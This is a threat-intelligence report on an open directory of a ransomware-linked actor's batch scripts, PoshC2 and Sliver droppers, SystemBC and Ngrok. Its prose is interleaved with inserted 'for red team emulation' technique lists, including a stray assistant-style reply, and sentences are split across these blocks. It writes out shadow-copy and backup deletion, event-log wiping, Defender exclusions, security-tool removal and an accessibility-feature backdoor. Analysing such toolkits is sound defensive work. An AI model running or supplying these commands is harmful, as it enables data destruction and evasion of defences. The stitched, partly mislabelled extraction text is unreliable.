Threat Actors’ Toolkit: Leveraging Sliver, PoshC2 & Batch Scripts Key Takeaways In early December of 2023, we discovered an open directory filled with batch scripts, primarily designed for defense evasion and executing command and control payloads. These scripts execute various actions, including disabling antivirus processes and stopping services related to SQL, Hyper-V, security tools, and Exchange servers. This report also highlights scripts responsible for erasing backups, wiping event logs, and managing the installation or removal of remote monitoring tools like Atera. Our investigation uncovered the use of additional tools, including Ngrok for proxy services, SystemBC, and two well-known command and control frameworks: Sliver and PoshC2. The observed servers show long term usage by the threat actors, appearing in The DFIR Report Threat Feeds as far back as September 2023. They have been active intermittently since then, with the most recent activity detected in August 2024. Ten new sigma rules were created from this report and added to our private sigma ruleset An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon. The DFIR Report Services Private Threat Briefs: Over 20 private DFIR reports annually. Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc. All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, opendir reports, long-term tracking, data clustering, and other curated intel. Private Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT&CK with test examples. DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on- demand, accommodating various learning speeds. Contact us today for pricing or a demo! Table of Contents: Summary

Phase: Defense Evasion

• Technique: Disabling Security Tools
• Procedure: Batch scripts identified for disabling antivirus processes and stopping services related to SQL, Hyper-V, security tools, and Exchange servers.

Phase: Impact

• Technique: Data Destruction (Backup Wiping)
• Procedure: Scripts used for erasing backups and wiping event logs.

Phase: Persistence

• Technique: Remote Monitoring Tool Management
• Procedure: Scripts manage the installation or removal of remote monitoring tools like Atera.

Phase: Command and Control (C2)

• Technique: Use of C2 Frameworks
• Tools: Sliver, PoshC2
• Technique: Proxy Services
• Tools: Ngrok for establishing proxy services.

Additional Tools and Frameworks

• Tool: SystemBC
• Purpose: Used alongside C2 frameworks for additional capabilities.

This structured summary provides a clear sequence of actions as observed in the CTI report, suitable for red team emulation.

Analysts Adversary Infrastructure Capability Victim Indicators Summary In this report, we delve into an open directory on 94.198.53.143, first observed on December 10, 2023, during our intelligence collection process. Prior to the open directory appearing, this address had appeared in our threat intelligence feeds for PoshC2 command and control. It first appeared on September 21, 2023 and has been intermittently active, most recently on August 11, 2024, showing that the infrastructure is being utilized over a long timeframe. Besides PoshC2, the threat actor identified utilized a range of batch scripts and malware to compromise both Windows and Linux systems. Their toolkit featured scripts such as atera_del.bat and atera_del2.bat to remove Atera agents, backup.bat and delbackup.bat to delete system backups and shadow copies, and clearlog.bat to erase Windows event logs and associated data. The actor employed cmd.cmd to disable User Account Control and modify registry settings, while scripts like def1.bat and defendermalwar.bat are used to disable Windows Defender, scheduled tasks, and uninstall Malwarebytes. They also utilized tools such as Ngrok for proxy purposes, Posh_v2_dropper_x64.exe for PowerShell-based command-and-control operations, and VmManagedSetup.exe, which contains SystemBC malware. The threat actor further disrupted systems by stopping and disabling various critical services, using scripts like disable.bat and hyp.bat, and logging off user sessions with LOGOFALL.bat and LOGOFALL1.bat. Their overarching goal appeared to be system compromise, data destruction, and evasion of detection mechanisms. During our investigation, we pivoted using Shodan and identified the name ‘PoshC2’ linked to port 443 among the open ports. Further exploration using the HTTP HTML hash filter (http.html_hash:-1700067737) revealed a second IP address, 185.234.216.64:8000, with another open directory containing binaries closely matching those found at the first IP address. Within the second open directory at 185.234.216.64:8000, we discovered a text file named poshc2+user.txt that outlined the creation of a user account by misspelling ‘WDAGUtilityAccount’ as ‘WDAGUtilltyAccount’. The script also included instructions for downloading the .MSI version of the Atera Agent using the email ‘datilragna@gmail.com’. Although the open directory at 94.198.53.143:8000, located in Russia, has been taken down,

Phase: Initial Access

• Technique: User Account Creation
• Procedure: Creation of a user account using a misspelled username: WDAGUtilltyAccount.

Phase: Execution

• Technique: PowerShell-based C2
• Tool: PoshC2
• Binary Executed: Posh_v2_dropper_x64.exe
• Procedure: Utilization of PowerShell for command-and-control operations.

Phase: Persistence

• Technique: MSI Installer for Remote Management
• Procedure: Download and install the Atera Agent MSI.

Phase: Defense Evasion

• Technique: Disable Security and Logging Features
• Command: cmd.cmd to disable User Account Control (UAC) and modify registry settings.
• Command: def1.bat and defendermalwar.bat to disable Windows Defender and uninstall Malwarebytes.
• Command: clearlog.bat to erase Windows event logs.
• Technique: Proxy Tool Usage
• Tool: Ngrok for establishing proxies.

Phase: Impact

• Technique: Data Destruction
• Command: backup.bat and delbackup.bat to delete system backups and shadow copies.
• Command: atera_del.bat and atera_del2.bat to remove Atera agents.
• Command: disable.bat and hyp.bat to stop and disable critical system services.
• Command: LOGOFALL.bat and LOGOFALL1.bat to log off user sessions.

Phase: Lateral Movement

• Technique: Use of Open Ports and Directories
• Procedure: Exploration of systems using open directories and identified ports for C2 connections.

various security vendors, including the DFIR Report, continue flagging this IP for PoshC2 activity. As of August 11, 2024, the second IP, 185.234.216.64:8000, remains accessible, indicating the threat actor’s continued use of this directory to host malicious batch scripts and binaries, leveraging PoshC2 and Sliver as their primary command-and-control tool kits. Compared to our last open directory report, no data was present to indicate victims or targeting information. However, based on the tools presented we can conclude with medium confidence that these servers were used in ransomware intrusion activity–seeing many scripts looking to kill or stop services, delete backups and shadow copies, and disable or remove antivirus software. Analysts Analysis and reporting completed by r3nzsec, 0xtornado & 0xThiebaut Adversary In the second open directory discovered via pivoting techniques, we observed a text file named ‘poshc2+user.txt’. This file detailed the creation of a user account, masquerading as the default Windows account ‘WDAGUtilityAccount’ but with an extra ‘l’, becoming ‘WDAGUtilltyAccount’. The script also included instructions to download the .MSI version of the Atera Agent using curl and a login of ‘datilragna@gmail.com’, which appears to be a legitimate email address associated with an Atera Agent account. Infrastructure During our analysis of the IP address hosting the open directory, 94.198.53.143, we found it associated with PoshC2. Using external data sources like VirusTotal revealed several connections, including file communications, downloads, URLs, and notably, collections of Command and Control (C2) frameworks. As illustrated in the screenshot provided, this IP address was linked to

Phase: Initial Access

• Technique: User Account Creation (Masquerading)
• Command: User creation script that creates an account named WDAGUtilltyAccount, mimicking WDAGUtilityAccount.

Phase: Execution

• Technique: Execution via Malicious Scripts
• Procedure: Scripts are used to kill or stop services, delete backups and shadow copies, and disable or remove antivirus software.

Phase: Persistence

• Technique: User Account Persistence
• Command: The creation of WDAGUtilltyAccount for maintaining access.

Phase: Command and Control

• Technique: Use of PoshC2 and Sliver Frameworks
• Tools: PoshC2, Sliver

Phase: Impact

• Technique: Data Destruction and Anti-Recovery
• Procedure: Scripts aim to delete backups and shadow copies to prevent data recovery post-ransomware attack.

Phase: Execution

• Technique: Use of Legitimate Software for Execution
• Command: Use of curl to download the .MSI version of the Atera Agent, enabling remote access and control.

two distinct C2 frameworks: ‘PoshC2’ and ‘Sliver’. These two command & control (C2) frameworks are available for download on GitHub and are commonly utilized by penetration testers and red team professionals as part of their assessments and simulations. Posh C2 – https://github.com/nettitude/PoshC2 Sliver – https://github.com/BishopFox/sliver However, we have also observed that these two opensource tools are being used by threat actors. We then proceeded to dig deeper into the open directory IP (94.198.53.143) using Shodan, to look around and see if we could find useful pivots, and additional information. A quick look into the information below, shows that this IP had multiple open ports: 80, 123, 443, 1337, 8000, 8443 Scrolling down the list of open ports, we noticed the name “PoshC2” associated with port 443. As this looked to be of interest in our investigation, we looked into the http html hash “http.html_hash:-1700067737” and used this as a new query to look around. Upon searching for that http.html_hash, we found another IP 185.234.216.64.

Phase: Command and Control

Technique: Utilization of PoshC2

• Description: The threat actor has been observed using the PoshC2 command and control framework.
• Details: Port 443 is associated with PoshC2, indicating potential HTTPS communication for C2 activities.

Technique: Utilization of Sliver

• Description: The Sliver C2 framework is known to be used by the threat actor.
• Details: Though specific ports or commands are not mentioned, Sliver is typically used for secure C2 communications over various protocols.

Inferred Techniques and Procedures

Technique: Port Scanning and Reconnaissance

• Inferred Procedure: The attacker may use tools like Shodan to identify open ports and associated services (e.g., using commands such as shodan search <query> to gather information about target infrastructure).

Technique: HTTP Service Identification

• Inferred Procedure: By analyzing HTTP HTML hashes, attackers might match specific web services or C2 panels (e.g., querying Shodan or similar services with http.html_hash:<hash> to identify targets).

Attackers utilize tools like Shodan and PoshC2/Sliver frameworks indirectly revealed by the presence of open ports and C2 associations to carry out their activities. Red teams can simulate similar reconnaissance and C2 setup as part of their exercises.

Upon further investigation, we discovered another active PoshC2 open directory with nearly identical batch and executable files to those found on the initial PoshC2 IP. This discovery was made through a simple pivot in Shodan. We retrieved files from this new open directory (185.234.216.64:8000) on two occasions: March 1, 2024, and June 29, 2024. Notably, the latest retrieval contained more files than the first one. However, the most interesting part of the March version of the open directory was the ‘poschc2+user.txt’ file, which we managed to retrieve before it was deleted by the threat actor. The DFIR Report Threat Feed Data The DFIR Report threat intelligence team has been monitoring these IP addresses for their involvement in various command and control frameworks for our Threat Feeds, prior to our investigation into the open directory. The IP address 94.198.53.143 was first detected on September 21, 2023, and has since shown intermittent activity. It has been primarily associated with PoshC2 and Sliver, with a single instance linked to Empire. The infrastructure’s use of different command and control frameworks is sporadic, but it is regularly reactivated, with the most recent activity occurring in August 2024.

Phase: Command and Control

• Technique: Use of PoshC2 Framework

• Procedure: Deployment and operation of PoshC2 as the command and control framework. Files retrieved from an open directory indicate the presence of batch and executable files typically associated with PoshC2 operations.

• Technique: Use of Multiple C2 Frameworks

• Procedure: The infrastructure is associated with other frameworks, including Sliver and Empire, suggesting versatility in C2 operations to avoid detection and ensure robustness.

Phase: Discovery

• Technique: Information Gathering from Open Directories
• Procedure: The threat actor maintained open directories containing operational files, indicating a reliance on exposed assets for maintaining access and control.

Note

• Tool and File Use: PoshC2 user details were found in a 'poschc2+user.txt' file, which potentially contains sensitive information about user accounts within the C2 framework. This file was deleted by the threat actor to cover tracks.

Phase: Infrastructure Setup and Maintenance

• Technique: Shodan for Asset Discovery
• Procedure: The threat actor's infrastructure was found using Shodan, indicating that parts of their C2 infrastructure (open directories) were indexed by search engines, likely due to misconfiguration or deliberate exposure for easy access.

Observations

• TTP Diversification: The use of different C2 frameworks (PoshC2, Sliver, Empire) points to a flexible approach, adjusting tactics based on operational requirements and possibly aiming to thwart detection through diversity in tools.

This IP (185.234.216.64) was also based in Moscow, Russia, with 3 open ports: 123, 443, and 8000. Checking out the open ports, we observed that port 8000 had an HTTP status code of 200, which hinted that this might still be active and accessible.

Based on the request to focus exclusively on procedures and excluding any IOCs or passive indicators, the provided text does not contain actionable TTPs or procedures for red team emulation related to executed command lines, programs, or specific attack techniques. The text simply describes network reconnaissance findings concerning open ports on a particular IP address.

If the report contained additional details on attack techniques or procedures beyond what was provided, those would be extracted and structured as requested. If you have a more detailed occurrence or other sections of the report you would like processed, please feel free to share them!

This batch script is used to delete all system state and general backups, remove all shadow copies, and ignore all boot failures. clearlog.bat This batch script to delete Windows event logs that also delete recycle bin and registry keys related to terminal server client. cmd.cmd This file disables UAC, modifies registry settings, including RDP settings. def1.bat This batch script disables Windows Defender and scheduled tasks. defendermalwar.bat This batch script disables Windows Defender, altering user account control settings and uninstalling Malwarebytes. delbackup.bat This batch script, which deletes all system state backups, backup catalogs, shadow copies, and alters boot configuration setting to ignore failures. disable.bat This batch script stops and disables services related to Microsoft SQL & Exchange, various database services, and additional system services on a Windows server/workstation. hyp.bat This batch script deletes various Hyper-V, SQL, and Firebird server services. It also stops a wide range of system and third-party services in Windows machines. LOGOFALL.bat This batch script lists all user sessions, and logs off each session except the first one. LOGOFALL1.bat This batch script attempts to log off all sessions up to the 20th session, excluding the user’s current session. NG1.bat This batch script contains a Ngrok authentication token that runs on port 3389 (RDP). NG2.bat This batch script that contains a Ngrok authentication token that runs in the same port, 3389 (RDP).

Phase: Defense Evasion

• Technique: Event Log Deletion

• Procedure: Batch script clearlog.bat deletes Windows event logs, empties the recycle bin, and removes registry keys related to the terminal server client.

• Technique: UAC and Registry Modification

• Procedure: Batch script cmd.cmd disables User Account Control (UAC) and modifies registry settings, including RDP settings.

• Technique: Disable Security Tools

• Procedure:
  • Script def1.bat disables Windows Defender and scheduled tasks.
  • Script defendermalwar.bat alters UAC settings and uninstalls Malwarebytes.

Phase: Impact

• Technique: Data Destruction

• Procedure:

  • Script delbackup.bat deletes all system state backups, backup catalogs, and shadow copies. It also changes boot configuration to ignore failures.

• Technique: Service Stop/Disable

• Procedure:
  • Script disable.bat stops and disables Microsoft SQL, Exchange services, various database services, and additional system services.
  • Script hyp.bat deletes Hyper-V, SQL, and Firebird server services, stopping a wide range of other services.

Phase: Lateral Movement

• Technique: Remote Desktop Protocol (RDP) via Ngrok
• Procedure:
  • Script NG1.bat contains a Ngrok authentication token running on port 3389.
  • Script NG2.bat contains another Ngrok authentication token also running on port 3389.

Phase: Account Manipulation

• Technique: User Session Log Off
• Procedure:
  • Script LOGOFALL.bat lists all user sessions and logs off each session except the first one.
  • Script LOGOFALL1.bat attempts to log off all sessions up to the 20th, excluding the current session.

The IP address 185.234.216.64 has been exclusively associated with PoshC2 activity. It has been intermittently used from October 2023 through August 2024. Capabilities This next section will cover the different tools/scripts in the open directory. Below is a short summary of each of the files, which we will then cover in more detail. atera_del.bat/atera_del2.bat This batch script is for removing Atera remote management agent. backup.bat

Phase: Execution

• Technique: Batch Script Execution
• Procedure: Utilizes the batch scripts atera_del.bat and atera_del2.bat to remove the Atera remote management agent. Exact command-line usage is not provided, but the scripts are likely executed using cmd.exe /c.

Phase: Command and Control

• Technique: PoshC2 Usage
• Procedure: The attacker uses PoshC2, a post-exploitation command and control framework. Likely commands would include PowerShell-based interactions and task executions initiated through PoshC2, although specific command lines are not detailed.

Ngrok.exe This is a legitimate tool, which can, and was, abused for proxy purposes. ON.bat This batch script to ensure that the network services are running and set to start automatically. Posh_v2_dropper_x64.exe The PoshC2 dropper, a PowerShell-based C2 executable. native_dropper The Linux version of Posh_v2_dropper_x64.exe. poshc2+user.txt The text file with PowerShell one-liners to execute PoshC2 agent and perform further post- exploitation actions. py_dropper.sh Bash shell script to execute a python dropper for PoshC2. Setup_uncnow.msi Atera remote admin tool installer. shadow.bat/shadowGuru.bat This batch script consists of multiple registry key deletions pertaining to security tools, including the creation of network shares for multiple disk drives while granting full access permissions to everyone. VmManagedSetup.exe SystemBC malware executable. WILD_PRIDE.exe Sliver C2 framework executable. z.bat This batch script is to remove services and processes associated with Hyper-V, multiple AV programs, SQL, and other specific services. z1.bat Huge scripts to automate the disabling of processes, services, registry modification, and a lot of defense evasion techniques. atera_del.bat/atera_del2.bat

Phase: Initial Access

• Technique: Remote Administration Tool Installation
• Procedure: Use of Setup_uncnow.msi to install Atera, enabling remote access.

Phase: Execution

• Technique: PowerShell Execution via PoshC2
• Procedure: Execution of poshc2+user.txt containing PowerShell one-liners to deploy and execute the PoshC2 agent.
• Command: Execution of Posh_v2_dropper_x64.exe or native_dropper for C2 communication.
• Command (Linux): Execution of py_dropper.sh to run a Python dropper for PoshC2.

Phase: Persistence

• Technique: Batch Script to Maintain Network Services
• Command: Execution of ON.bat to ensure network services are running and set to start automatically.

Phase: Defense Evasion

• Technique: Modification of Security Settings
• Command: Execution of shadow.bat or shadowGuru.bat to delete registry keys of security tools and create open network shares.
• Command: Execution of z.bat to remove services and processes associated with security tools.
• Command: Execution of z1.bat to automate the disabling of processes, services, and registry modifications.

Phase: Lateral Movement

• Technique: Proxy Abuse for C2
• Command: Use of ngrok.exe to establish a proxy for secure C2 communications.

Phase: Impact

• Technique: Malware Deployment
• Command: Execution of VmManagedSetup.exe to deploy SystemBC malware.
• Command: Execution of WILD_PRIDE.exe to deploy Sliver C2 framework.

Phase: Cleanup

• Technique: Removal of Remote Admin Tool
• Command: Execution of atera_del.bat or atera_del2.bat to remove Atera installations.

The main goal of this batch file is to remove and uninstall Atera software, including the registry keys, services, and directories associated with Atera Agent installation. The exact commands observed in atera_del.bat have been seen in many public resources as a known way to uninstall/ delete Atera from a system. https://www.reddit.com/r/syncro/comments/pf85te/ working_script_for_removing_atera_agent/ https://www.cliftonsystems.co.uk/atera-removal-script/ https://patrickdomingues.com/2022/01/19/how-to-uninstall-atera-agent-software/ The first line command is to silently uninstall the software associated with the given product code via msiexec, which in this case, is the product code dedicated to Atera. The command line parameter “/x” is used to uninstall a program, while the “/qn” means quiet mode to uninstall Atera silently without any prompts to the user. The timeout command is used to ensure a slight pause (5 secs) after the uninstallation command is executed, possibly to allow for proper completion of the Atera uninstall process before proceeding to any subsequent commands in the batch file.

Phase: Execution

• Technique: Software Uninstallation via Command Line
• Command: msiexec /x {product-code} /qn
• Description: Silently uninstalls Atera software using msiexec with "/x" for uninstall and "/qn" for quiet mode.

Phase: Defense Evasion

• Technique: Timed Execution
• Command: timeout /t 5 /nobreak
• Description: Pauses the script for 5 seconds to ensure the uninstallation process completes successfully before proceeding.

The sc command is also used, first to stop and then completely remove the AteraAgent service, all done silently without showing any output to the user with the help of “> nul 2> nul” commands. The taskkill command is used to terminate a specific process, which in this case is the TicketingTray.exe. TicketingTray.exe is part of the AteraAgent software commonly used to display the Atera Icon on the system. The REG command is used to force “f” delete the registry keys related to Atera Networks RMDIR command silently and recursively deletes the “TrayIconCaching” directory in the current user’s local temporary files. “/S” removes all directories and files in the specified directory in addition to the directory itself, while “/Q” stands for ‘quiet mode’ and does not prompt for confirmation. The RMDIR command is used again to delete the installation folders of “ATERA Networks” from both the standard “Program Files” and “Program Files (x86)” directories. backup.bat These commands are intended to prevent data recovery, delete the volume shadow copies, and configure system boot settings, all making it more difficult to restore. [W]badmin is a command-line utility for Windows backup and restore. The DELETE SYSTEMSTATEBACKUP arguments are used to delete system state backups. The flag- keepVersions:0 specifies that no versions of the system state backups should be kept, essentially deleting all existing system state backups. Next, the script runs wbadmin again. Similar to the previous command, this one is for deleting regular backups (not just system state backups). [W]mic is another command-line utility used to interact with Windows Management Instrumentation (WMI) that can be used to delete volume shadow copies The vssadmin command is used for the deletion of a specified volume’s shadow copies. In this case, it uses the “/All’ parameter which deletes all shadow copies on the system. Shadow copies are used by Windows for backups and system restores. At the end the tool is used again to confirm shadow deletion. [B]cdedit.exe is then used to disable WINDOWS automatic recovery features by modifying boot

Phase: Defense Evasion

Technique: Service Manipulation

• Command: sc stop AteraAgent > nul 2> nul
• Command: sc delete AteraAgent > nul 2> nul

Technique: Process Termination

• Command: taskkill /IM TicketingTray.exe /F

Technique: Registry Modification

• Command: REG DELETE <RegistryKey> /f

Technique: Indicator Removal on Host

• Command: RMDIR /S /Q "%TEMP%\TrayIconCaching"
• Command: RMDIR /S /Q "C:\Program Files\ATERA Networks"
• Command: RMDIR /S /Q "C:\Program Files (x86)\ATERA Networks"

Phase: Impact

Technique: Inhibit System Recovery

• Command: wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
• Command: wbadmin DELETE BACKUP -keepVersions:0
• Command: wmic shadowcopy delete
• Command: vssadmin delete shadows /All
• Command: vssadmin delete shadows /All (confirmation of deletion)
• Command: bcdedit.exe /set {default} recoveryenabled No

These commands are used to disable recovery features and delete backups, making restoration more difficult.

configuration data. clearlog.bat This batch script checks if the user has administrative privileges and clears event logs in Windows. The IT community commonly uses portions of these commands, as seen in these posts in several IT forums many years ago. https://answers.microsoft.com/en-us/windows/forum/all/clear-all-administratative-event-logs- in-event/17c5fba6-dc5e-4acd-9db0-e20665ce3ad5 https://www.get-itsolutions.com/commands-clean-recycle-bin/ Let’s break down each phase of the codes and discuss the functionalities of it. The @echo off command line hides the command execution output from the console itself while setting a timer for 60 seconds using the timeout /T 60 FOR /F “tokens=1,2*” %%V IN (‘bcdedit’) DO SET adminTest=%%V is a loop that iterates through the output of bcdedit command that shows boot configuration data and searches for lines containing:

Phase: Execution

• Technique: Batch Script Execution for Event Log Clearing
• Command:
• @echo off: Hides the command execution output from the console.
• timeout /T 60: Sets a delay of 60 seconds.

Phase: Privilege Escalation

• Technique: Checking for Administrative Privileges
• Command: FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
• Purpose: Iterates through the output of the bcdedit command to identify administrative privileges.

Phase: Impact

• Technique: Clear Windows Event Logs
• Command: Steps inferred from the context suggest using a command like wevtutil cl <logname> to clear event logs if administrative privileges are confirmed.

IF (%adminTest%)==(Access) goto noAdmin, this conditional statement checks if the admintest variable is equal to “Access”. If it is, the execution jumps to the noAdmin label, effectively skipping the log-clearing process. This command has a loop that iterates through the output of wevtutil.exe el command, which lists event logs and, for each line, calls the :do_clear subroutine with the line’s content as an argument. The line echo clearing%1 prints a message indicating which event log is being cleared. The %1 placeholder is replaced by the actual log name passed from the main loop. [W]evtutil.exe cl %1 clears the specific event log identified by the %1 argument. This line of command clears out the $Recycle.bin directory from the system partition. The above commands are used to delete the Remote Desktop Protocol traces found on the host artifacts. During our usual analysis, these are the artifacts that are commonly left by the threat actor for us to identify the RDP related activities as part of their lateral movement. These commands attempt to delete registry keys related to remote desktop settings under the current user’s profile, where the following options were used: /va: Deletes all values associated with the key /f: Forces the deletion, even if the key is protected cd %userprofile%\documents\ this command will perform a change directory to the documents folder using the user profile where default.rdp is commonly stored. Default.rdp typically stores the settings for the RDP connections.. As default.rdp is a hidden file that is stored for each user, attrib

Phase: Defense Evasion

• Technique: Conditional Execution for Privilege Check
• Procedure: Execute a batch script using a conditional check IF (%adminTest%)==(Access) goto noAdmin to determine administrative access. If access is not granted, it skips log clearing by jumping to the noAdmin label.

Phase: Defense Evasion

• Technique: Event Log Clearing
• Command:
• Loop through event logs using wevtutil.exe el
• For each log, execute wevtutil.exe cl %1 to clear it
• Print progress with echo clearing%1

Phase: Defense Evasion

• Technique: File Deletion
• Procedure: Clear $Recycle.bin directory to remove traces of deleted files.

Phase: Defense Evasion

• Technique: Registry Modification for Remote Desktop Traces
• Command: REG DELETE <RegistryKey> /va /f
• Deletes registry keys related to RDP settings of the current user using options /va (delete all values) and /f (force deletion).

Phase: Defense Evasion

• Technique: File Deletion for RDP Configuration
• Procedure:
• Change directory to the user's Documents folder: cd %userprofile%\documents\
• Target default.rdp file for deletion/alteration, which stores user RDP settings.

Default.rdp -s -h needs to run (“-s” removes the “System” attribute from the file while “-h” removing the “hidden” attribute) for it to become visible. Once visible, the command del Default.rdp will execute the deletion of the file as part of the threat actor’s deletion of RDP traces. cmd.cmd The script above describes itself with its comments. The script is meant to disable User Account Control (UAC), backdoor the Sticky Keys, Utilman, and other accessibility features with cmd.exe, and disable Network Level Authentication (NLA). Running this script would allow the threat actor to access the Windows sign-in screen without authentication and run commands using the backdoor accessibility tools in the system context. def1.bat The following batch script is another defense evasion script that provides several commands to disable Windows Defender.

Phase: Defense Evasion

• Technique: Modify File Attributes

• Command: attrib -s -h Default.rdp

• Technique: Delete Files

• Command: del Default.rdp

Phase: Persistence

• Technique: Accessibility Features Backdoor
• Command: Replace sethc.exe and Utilman.exe with cmd.exe

Phase: Defense Evasion

• Technique: UAC Bypass

• Command: Use a script to disable User Account Control (UAC).

• Technique: Disable Network Level Authentication (NLA)

• Command: Use a script to modify system settings to disable NLA.

• Technique: Disable Windows Defender

• Command: Utilize def1.bat to execute commands that disable Windows Defender functionalities.

The first part of this script adds a dozen registry keys to disable several components of Windows Defender including Real-Time Protection, SpyNet, and MpEngine. The second section of the script tries to disable registry keys related to ETW tracing and logging. The third section disables multiple scheduled tasks related to Windows Defender. In the fourth area, the script works to remove various GUI access for Windows defender, particularly the system tray icon and the context menu access for things like on demand scanning. The fifth part of this script is using PowerShell to add the whole volumes (C:\, D:\, E:\, and F:) as an exclusion path for Defender. The sixth part then sets registry values to disable various Windows Defender services. defendermalwar.bat This batch script executes several commands designed to disable various Windows Defender registry keys and alter User Account Control settings. WMIC command was also used in the last part of the script to uninstall Malwarebytes. The commands above were used to modify the registry key settings related to UAC on a Windows

Phase: Defense Evasion

Technique: Modify Registry to Disable Security Features

• Procedure: Add registry keys to disable Windows Defender components.
• Components targeted: Real-Time Protection, SpyNet, MpEngine.

Technique: Disable ETW (Event Tracing for Windows)

• Procedure: Disable registry keys related to ETW tracing and logging.

Technique: Disable Scheduled Tasks

• Procedure: Disable multiple scheduled tasks related to Windows Defender.

Technique: Modify GUI Access

• Procedure: Remove GUI access for Windows Defender, including the system tray icon and context menu access.

Technique: PowerShell Execution for Security Feature Bypass

• Command: powershell -Command Set-MpPreference -ExclusionPath "C:\", "D:\", "E:\", "F:\"

Technique: Modify Registry for Windows Defender

• Procedure: Set registry values to disable various Windows Defender services.

Phase: Privilege Escalation

Technique: Modify Registry for User Account Control (UAC)

• Procedure: Modify registry key settings related to UAC.

Technique: Software Uninstallation

• Command: wmic product where "name='Malwarebytes'" call uninstall

Tool/Script Used

• Script Name: defendermalwar.bat
• Purpose: Disable Windows Defender and alter UAC settings through multiple command executions.

system. Let’s dissect each one of these: PromptOnSecureDesktop, setting this value to 0 disables the secure desktop when UAC prompts appear. Disabling this feature means UAC prompts will appear on the user’s current desktop, which could be less secure as some malware might interact with or spoof the UAC prompt. EnableLUA, setting this value to 1 enables Limited User Account (LUA) capabilities, the underlying technology for UAC. ConsentPromptBehaviorAdmin, setting this to 0 modifies the behavior of UAC prompts for administrative users. In this mode, when actions requiring administrative privileges are performed, the UAC prompt will not ask for consent (or credentials on standard user accounts) These commands collectively disable various Windows Defender security settings, including real- time protection and behavior monitoring. These PowerShell commands remove the Windows Defender feature, forcefully restart the Windows Defender service, and forcefully restart the Windows Firewall service. The last part of the commands contain wmic (Windows Management Instrumentation Commandline) to silently uninstall any products whose names contain ‘Malwarebytes’. delbackup.bat

Phase: Defense Evasion

Technique: User Account Control (UAC) Bypass

• Procedure: Modify registry settings to alter UAC behavior.
• Registry Modification: PromptOnSecureDesktop set to 0 disables secure desktop for UAC prompts.
• Registry Modification: ConsentPromptBehaviorAdmin set to 0 modifies UAC prompt for admins to not ask for consent.

Technique: Disable Security Tools

• Command: PowerShell commands executed to disable various Windows Defender settings, including real-time protection and behavior monitoring.
• Procedure: Remove Windows Defender feature and restart services.
• Procedure: Force restart of Windows Defender and Windows Firewall services.

Technique: Uninstall Security Products

• Command: Use WMIC to uninstall software.
• Command: wmic product where "name like '%Malwarebytes%'" call uninstall /nointeractive

Phase: Execution

• Procedure: Execution of batch script to perform system modifications.
• Command: delbackup.bat

Just like the other script (backup.bat), it primarily focuses on removing backup and system restore points from a Windows system, disabling recovery options, and modifying the boot configuration to ignore failures. It uses command-line utilities like wbadmin, wmic, vssadmin, and bcdedit to delete existing backups, shadow copies, and system state backups, and then alters the system’s boot settings to prevent automatic recovery actions in case of errors. Lines one through seven repeat the same actions observed in the prior discussed script. cmd.exe /C wbadmin STOP job: Stops any backup jobs currently running. cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet: Deletes all the backups of system files and settings without leaving any copies. cmd.exe /C wbadmin DELETE CATALOG -quiet: Removes the record of all backups so the system no longer knows they existed. cmd.exe /C wbadmin DISABLE backup: Turns off the backup schedule, so no more automatic backups will be made. cmd.exe /C bcdedit /set {default} recoveryenabled No and cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures: These commands make the computer ignore errors during startup and stop trying to fix them automatically.

Phase: Defense Evasion

Technique: Inhibit System Recovery

• Command: cmd.exe /C wbadmin STOP job

• Purpose: Stops any backup jobs currently running.

• Command: cmd.exe /C wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0 -quiet

• Purpose: Deletes all the backups of system files and settings without leaving any copies.

• Command: cmd.exe /C wbadmin DELETE CATALOG -quiet

• Purpose: Removes the record of all backups so the system no longer knows they existed.

• Command: cmd.exe /C wbadmin DISABLE backup

• Purpose: Turns off the backup schedule, so no more automatic backups will be made.

Technique: Boot Configuration Modification

• Command: cmd.exe /C bcdedit /set {default} recoveryenabled No

• Purpose: Disables automatic recovery actions during system startup.

• Command: cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures

• Purpose: Configures the system to ignore errors during startup and prevents automatic fixes.

The last part of the script automates the deletion of all shadow copies (backup snapshots) on a Windows system and then removes itself. First, it changes the directory to the one containing the script, then, creates and executes a command sequence through diskshadow, to delete the shadow copies; and finally, deletes the command file and the script itself, after pausing for user input. disable.bat This batch script contains 398 lines of code and can kill processes and disable multiple services including web servers, databases, and exchange services. Examples of commands used are: net stop MSExchangeDelivery sc config MSExchangeDelivery start= disabled net stop MSExchangeDiagnostics sc config MSExchangeDiagnostics start= disabled net stop MSExchangeEdgeSync taskkill -f -im sqlbrowser.exe taskkill -f -im sqlwriter.exe taskkill -f -im sqlservr.exe taskkill -f -im msmdsrv.exe taskkill -f -im MsDtsSrvr.exe The script also deletes many AV services, including Trend Micro, ESET, and Kaspersky:

Phase: Defense Evasion

• Technique: Disable Security Tools and Services
• Command (Examples):
• net stop MSExchangeDelivery
• sc config MSExchangeDelivery start= disabled
• net stop MSExchangeDiagnostics
• sc config MSExchangeDiagnostics start= disabled
• net stop MSExchangeEdgeSync
• taskkill -f -im sqlbrowser.exe
• taskkill -f -im sqlwriter.exe
• taskkill -f -im sqlservr.exe
• taskkill -f -im msmdsrv.exe
• taskkill -f -im MsDtsSrvr.exe

Phase: Impact

• Technique: Inhibit System Recovery
• Procedure: Using diskshadow to delete shadow copies.
• Command Sequence:
• Change directory to the one containing the script.
• Create and execute a command sequence through diskshadow to delete shadow copies.
• Delete the command file and the script after pausing for user input.

